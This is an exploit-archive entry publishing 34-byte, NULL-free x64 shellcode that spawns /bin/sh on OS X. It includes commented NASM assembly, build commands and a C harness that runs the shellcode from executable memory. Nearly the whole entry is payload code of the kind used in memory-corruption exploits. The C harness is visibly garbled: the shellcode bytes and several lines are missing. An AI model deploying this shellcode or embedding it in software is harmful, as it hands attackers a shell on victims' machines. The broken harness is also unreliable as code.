OS X x64 /bin/sh Shellcode, NULL Byte Free - 34 bytes

ID 1337DAY-ID-24188
Type zdt
Reporter Fitzl Csaba
Modified 2015-09-02T00:00:00


Exploit for os-x/x86 platform in category shellcode

                                            [*] Author: Csaba Fitzl, @theevilbit
[*] Tested on OS X 10.10.5
[*] OS X x64 /bin/sh shellcode, NULL byte free, 34 bytes
[*] Assembly version
[*] binsh-shellcode.asm
[*] ./nasm -f macho64 binsh-shellcode.asm
[*] ld -macosx_version_min 10.7.0 -o binsh-shellcode binsh-shellcode.o 
global start
section .text
    xor     rsi,rsi                 ;zero out RSI
    push    rsi                     ;push NULL on stack
    mov     rdi, 0x68732f6e69622f2f ;mov //bin/sh string to RDI (reverse)
    push    rdi                     ;push rdi to the stack
    mov     rdi, rsp                ;store RSP (points to the command string) in RDI
    xor     rdx, rdx                ;zero out RDX
    ;store syscall number on RAX
    xor     rax,rax                 ;zero out RAX
    mov     al,2                    ;put 2 to AL -> RAX = 0x0000000000000002
    ror     rax, 0x28               ;rotate the 2 -> RAX = 0x0000000002000000
    mov     al,0x3b                 ;move 3b to AL (execve SYSCALL#) -> RAX = 0x000000000200003b
    syscall                         ;trigger syscall
[*] C version
[*] Get the hex opcodes from the object file: otool -t binsh-shellcode.o
[*] binsh-shellcode.c
[*] Compile: gcc binsh-shellcode.c -o sc
[*] Run: ./sc
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
char shellcode[] =
int main(int argc, char **argv) {
    void *ptr = mmap(0, 0x22, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON
            | MAP_PRIVATE, -1, 0);
    if (ptr == MAP_FAILED) {
    memcpy(ptr, shellcode, sizeof(shellcode));
    sc = ptr;
    return 0;

#  0day.today [2016-04-19]  #